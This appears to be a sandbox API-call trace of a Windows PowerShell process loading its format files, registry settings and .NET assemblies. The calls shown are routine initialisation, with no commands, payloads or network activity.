	[0159.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0159.931] SetErrorMode (uMode=0x1) returned 0x1
	[0159.931] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0159.931] SetErrorMode (uMode=0x1) returned 0x1
	[0159.931] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0159.931] SetErrorMode (uMode=0x1) returned 0x1
	[0159.931] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd770 | out: lpFileInformation=0xdd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0159.931] SetErrorMode (uMode=0x1) returned 0x1
	[0159.933] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0159.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.933] CoTaskMemFree (pv=0x27d410) 
	[0159.938] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0159.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.939] CoTaskMemFree (pv=0x27d410) 
	[0159.941] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0159.941] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.941] CoTaskMemFree (pv=0x27d410) 
	[0159.943] CoTaskMemAlloc (cb=0x104) returned 0x27d410
	[0159.943] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d410, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.943] CoTaskMemFree (pv=0x27d410) 
	[0159.984] ReadFile (in: hFile=0x324, lpBuffer=0x33cdbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cdbb0*, lpNumberOfBytesRead=0xdd408*=0x1000, lpOverlapped=0x0) returned 1
	[0160.001] ReadFile (in: hFile=0x324, lpBuffer=0x33cdbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cdbb0*, lpNumberOfBytesRead=0xdd408*=0x1000, lpOverlapped=0x0) returned 1
	[0160.019] ReadFile (in: hFile=0x324, lpBuffer=0x33cdbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cdbb0*, lpNumberOfBytesRead=0xdd408*=0x1000, lpOverlapped=0x0) returned 1
	[0160.038] ReadFile (in: hFile=0x324, lpBuffer=0x33cdbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cdbb0*, lpNumberOfBytesRead=0xdd408*=0x1000, lpOverlapped=0x0) returned 1
	[0160.056] ReadFile (in: hFile=0x324, lpBuffer=0x33cdbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cdbb0*, lpNumberOfBytesRead=0xdd408*=0x1000, lpOverlapped=0x0) returned 1
	[0160.090] ReadFile (in: hFile=0x324, lpBuffer=0x33cdbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cdbb0*, lpNumberOfBytesRead=0xdd408*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.110] ReadFile (in: hFile=0x324, lpBuffer=0x33cd0fa, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cd0fa*, lpNumberOfBytesRead=0xdd408*=0x0, lpOverlapped=0x0) returned 1
	[0160.134] ReadFile (in: hFile=0x324, lpBuffer=0x33cdbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xdd408, lpOverlapped=0x0 | out: lpBuffer=0x33cdbb0*, lpNumberOfBytesRead=0xdd408*=0x0, lpOverlapped=0x0) returned 1
	[0160.156] CloseHandle (hObject=0x324) returned 1
	[0160.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.198] SetErrorMode (uMode=0x1) returned 0x1
	[0160.198] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xdd3b0 | out: lpFileInformation=0xdd3b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.231] SetErrorMode (uMode=0x1) returned 0x1
	[0160.231] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.231] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdd498 | out: phkResult=0xdd498*=0x324) returned 0x0
	[0160.231] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdd41c, lpData=0x0, lpcbData=0xdd418*=0x0 | out: lpType=0xdd41c*=0x1, lpData=0x0, lpcbData=0xdd418*=0x56) returned 0x0
	[0160.231] CoTaskMemAlloc (cb=0x5a) returned 0x2f87b0
	[0160.231] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdd3ec, lpData=0x2f87b0, lpcbData=0xdd3e8*=0x56 | out: lpType=0xdd3ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xdd3e8*=0x56) returned 0x0
	[0160.231] CoTaskMemFree (pv=0x2f87b0) 
	[0160.231] RegCloseKey (hKey=0x324) returned 0x0
	[0160.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xdd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xdcf90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.245] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xc5f92908, Data2=0x40a9, Data3=0x4c49, Data4=([0]=0xa1, [1]=0x82, [2]=0xaf, [3]=0x0, [4]=0x4, [5]=0x9a, [6]=0xc0, [7]=0xd2))) returned 0x0
	[0160.316] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xbea8e13d, Data2=0x818a, Data3=0x431a, Data4=([0]=0xab, [1]=0x20, [2]=0xe, [3]=0x93, [4]=0xdf, [5]=0xef, [6]=0xf4, [7]=0xa8))) returned 0x0
	[0160.623] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xc48a872d, Data2=0xda6e, Data3=0x41de, Data4=([0]=0xb1, [1]=0x42, [2]=0xb3, [3]=0x68, [4]=0x15, [5]=0x4f, [6]=0x80, [7]=0x82))) returned 0x0
	[0160.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0160.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0160.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0160.665] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0160.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xdc920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0165.023] VirtualQuery (in: lpAddress=0xdbf30, lpBuffer=0xdcdf0, dwLength=0x30 | out: lpBuffer=0xdcdf0*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.024] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0x2a6bff48, Data2=0xd0d6, Data3=0x4783, Data4=([0]=0xa9, [1]=0x4c, [2]=0xd4, [3]=0xfd, [4]=0xfb, [5]=0x3f, [6]=0x0, [7]=0xc9))) returned 0x0
	[0165.025] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xb768cc54, Data2=0x5ad8, Data3=0x4efd, Data4=([0]=0x99, [1]=0x6f, [2]=0x8f, [3]=0xf5, [4]=0xe4, [5]=0x19, [6]=0x54, [7]=0xfc))) returned 0x0
	[0165.026] VirtualQuery (in: lpAddress=0xdc0e0, lpBuffer=0xdcfa0, dwLength=0x30 | out: lpBuffer=0xdcfa0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.027] VirtualQuery (in: lpAddress=0xdc0e0, lpBuffer=0xdcfa0, dwLength=0x30 | out: lpBuffer=0xdcfa0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.028] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xf9b7f73c, Data2=0x1d4b, Data3=0x4cbb, Data4=([0]=0xbe, [1]=0x9, [2]=0x32, [3]=0x4, [4]=0x29, [5]=0x9d, [6]=0x4a, [7]=0x11))) returned 0x0
	[0165.030] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0x914bef74, Data2=0xc9ab, Data3=0x4c09, Data4=([0]=0xbd, [1]=0x89, [2]=0x2a, [3]=0x6e, [4]=0x39, [5]=0xa3, [6]=0xdb, [7]=0x91))) returned 0x0
	[0165.031] VirtualQuery (in: lpAddress=0xdc330, lpBuffer=0xdd1f0, dwLength=0x30 | out: lpBuffer=0xdd1f0*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.035] VirtualQuery (in: lpAddress=0xdb9a0, lpBuffer=0xdc860, dwLength=0x30 | out: lpBuffer=0xdc860*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0165.948] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xf9267b91, Data2=0xcc7a, Data3=0x4a3b, Data4=([0]=0xa2, [1]=0x42, [2]=0xb6, [3]=0x19, [4]=0x4, [5]=0x16, [6]=0x6d, [7]=0x5e))) returned 0x0
	[0165.948] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0x37ac2c85, Data2=0x5aa9, Data3=0x4f88, Data4=([0]=0x8a, [1]=0xed, [2]=0xb9, [3]=0x53, [4]=0x36, [5]=0x3a, [6]=0xbe, [7]=0x3a))) returned 0x0
	[0165.949] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xaab32698, Data2=0x40c4, Data3=0x4894, Data4=([0]=0xab, [1]=0x6b, [2]=0xc7, [3]=0xb2, [4]=0xcf, [5]=0x43, [6]=0x50, [7]=0x71))) returned 0x0
	[0165.949] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0x8ae756b7, Data2=0x4b0a, Data3=0x4d1d, Data4=([0]=0xa3, [1]=0x49, [2]=0x90, [3]=0x23, [4]=0x12, [5]=0xd8, [6]=0xff, [7]=0x8f))) returned 0x0
	[0165.950] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0x4ec1a26f, Data2=0xe148, Data3=0x4c73, Data4=([0]=0x98, [1]=0xf6, [2]=0x29, [3]=0xa1, [4]=0x6b, [5]=0x4c, [6]=0xf4, [7]=0x1d))) returned 0x0
	[0165.950] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0xb44a413c, Data2=0xcb25, Data3=0x4f06, Data4=([0]=0x92, [1]=0xcf, [2]=0x9f, [3]=0xc6, [4]=0xfe, [5]=0x8f, [6]=0xbc, [7]=0x9d))) returned 0x0
	[0165.950] VirtualQuery (in: lpAddress=0xdc070, lpBuffer=0xdcf30, dwLength=0x30 | out: lpBuffer=0xdcf30*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0165.951] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0x9c3f3879, Data2=0xd3d4, Data3=0x4a56, Data4=([0]=0xaa, [1]=0xc8, [2]=0x77, [3]=0xe9, [4]=0x56, [5]=0xc7, [6]=0xbe, [7]=0xbb))) returned 0x0
	[0165.952] VirtualQuery (in: lpAddress=0xdc070, lpBuffer=0xdcf30, dwLength=0x30 | out: lpBuffer=0xdcf30*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0165.952] VirtualQuery (in: lpAddress=0xdc070, lpBuffer=0xdcf30, dwLength=0x30 | out: lpBuffer=0xdcf30*(BaseAddress=0xdc000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0176.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.551] CoCreateGuid (in: pguid=0xdd6c0 | out: pguid=0xdd6c0*(Data1=0x5887ef84, Data2=0xaac7, Data3=0x4600, Data4=([0]=0xba, [1]=0xea, [2]=0x2c, [3]=0xb4, [4]=0x37, [5]=0x33, [6]=0x9f, [7]=0xf))) returned 0x0
	[0176.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0176.554] VirtualQuery (in: lpAddress=0xdb6d0, lpBuffer=0xdc590, dwLength=0x30 | out: lpBuffer=0xdc590*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.555] VirtualQuery (in: lpAddress=0xdb760, lpBuffer=0xdc620, dwLength=0x30 | out: lpBuffer=0xdc620*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0176.555] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdcb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
